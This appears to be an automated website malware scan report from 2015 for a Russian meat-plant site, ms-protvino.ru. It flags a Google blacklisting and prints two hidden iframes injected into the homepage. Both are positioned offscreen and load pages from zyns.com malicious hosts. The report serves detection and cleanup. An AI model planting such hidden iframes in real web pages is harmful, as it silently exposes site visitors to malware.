New scan:

Malware Scanner report for ms-protvino.ru

Malicious/Suspicious/Total urls checked
1/0/8
1 page has malicious code. See details below
Blacklists
Found
The website is marked by Google as suspicious.

The website "ms-protvino.ru" is probably hacked and losing its visitors. You need to take action as soon as possible to fix security issues.
Malicious Redirects
OK
Malicious/Hidden/Total iFrames
2/0/2
2 malicious iframes found. See details below
Deface / Content modification
OK

Free periodic scanning and alerting: setup
(requires eVuln badge or a link to eVuln.com)

Malware & Hack Repair

  • Malware Removal
  • Blacklists Removal
  • Reason Eliminating
  • 1 Month Hack Insurance

More details

Website Hack Insurance

  • Files & DB Monitoring
  • Daily Backups
  • Malware & Hack Detection
  • Unlimited Hack Repairs

More details

Safe Browsing / Blacklists

Query: http://www.google.com/safebrowsing/diagnostic?site=ms-protvino.ru

Result: The website is marked by Google as suspicious. - visiting this web site may harm your computer.
Details are available here.

Scanned pages/files

RequestServer responseStatus
http://ms-protvino.ru/
200 OK
Content-Length: 19331
Content-Type: text/html
malicious
Page code contains blacklisted domain: staatis.zyns.com

<!DOCTYPE html>
<html>
<head>
<title>Официальный сайт — Протвинский мясокомбинат</title>
<meta charset="UTF-8">
<meta name="viewport" content="width=device-width, initial-scale=1.0">
<meta name="cmsmagazine" content="4844a40c52c44f1512d7761a02245ba5" />
<script src="http://ajax.googleapis.com/ajax/libs/jquery/1.8.2/jquery.m
...[4110 bytes skipped]...

Malicious iFrame found.
size: 468x60     
src: http://staatis.zyns.com/out.php?sid=3
This URL is marked by Google as suspicious

<iframe src="http://staatis.zyns.com/out.php?sid=3" width="468" height="60" style="position:absolute;left:-10000px;">

Malicious iFrame found.
size: 468x60     
src: http://starsic.zyns.com/out.php?sid=3
This URL is marked by Google as suspicious

<iframe src="http://starsic.zyns.com/out.php?sid=3" width="468" height="60" style="position:absolute;left:-10000px;">

http://ajax.googleapis.com/ajax/libs/jquery/1.8.2/jquery.min.js
200 OK
Content-Length: 93435
Content-Type: text/javascript
clean
http://ms-protvino.ru//ms-protvino.ru.js.1c-bitrix-cdn.ru/bitrix/templates/main/slider/jquery.bxslider.min.js?141259234819123/
200 OK
Content-Length: 0
Content-Type: text/html
clean
http://ms-protvino.ru/test404page.js
200 OK
Content-Length: 0
Content-Type: text/html
clean
http://ms-protvino.ru//ms-protvino.ru.js.1c-bitrix-cdn.ru/bitrix/templates/main/fancybox/lib/jquery.mousewheel-3.0.6.pack.js?14125923491384/
200 OK
Content-Length: 0
Content-Type: text/html
clean
http://ms-protvino.ru/bitrix/templates/main/fancybox/source/jquery.fancybox.pack.js?v=2.1.5
200 OK
Content-Length: 23135
Content-Type: application/x-javascript
clean
http://api-maps.yandex.ru/2.1/?lang=ru_RU
200 OK
Content-Length: 115445
Content-Type: text/javascript
clean
http://ms-protvino.ru//ms-protvino.ru.js.1c-bitrix-cdn.ru/bitrix/cache/js/s1/main/kernel_main/kernel_main.js?1415781545317507/
200 OK
Content-Length: 0
Content-Type: text/html
clean

Malicious Redirects

First query (normal visit):
GET / HTTP/1.1
Host: ms-protvino.ru

Result:
HTTP/1.1 200 OK
Cache-Control: no-store, no-cache, must-revalidate, post-check=0, pre-check=0
Connection: close
Date: Tue, 27 Jan 2015 14:25:29 GMT
Pragma: no-cache
Server: nginx/1.6.2
Content-Type: text/html; charset=UTF-8
Expires: Thu, 19 Nov 1981 08:52:00 GMT
P3P: policyref="/bitrix/p3p.xml", CP="NON DSP COR CUR ADM DEV PSA PSD OUR UNR BUS UNI COM NAV INT DEM STA"
Set-Cookie: PHPSESSID=1dfc11bbcb0a8254105deb73a7efd57b; path=/; HttpOnly
X-Powered-By: PHP/5.3.13
X-Powered-CMS: Bitrix Site Manager (4bd320ffb0621369afef5bd28e09e533)
Second query (visit from search engine):
GET / HTTP/1.1
Host: ms-protvino.ru
Referer: http://www.google.com/search?q=ms-protvino.ru

Result:
The result is similar to the first query. There are no suspicious redirects found.